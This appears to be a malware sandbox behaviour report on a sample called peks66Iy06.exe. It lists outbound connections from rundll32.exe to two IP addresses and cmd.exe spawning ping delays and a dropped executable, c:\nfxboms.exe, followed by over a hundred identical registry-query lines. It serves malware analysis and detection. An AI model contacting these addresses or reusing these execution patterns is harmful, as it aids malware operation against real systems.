Code function: 11_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary,

11_2_100051B0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 202.108.0.52 443			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 107.163.241.232 12354			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\nfxboms.exe c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
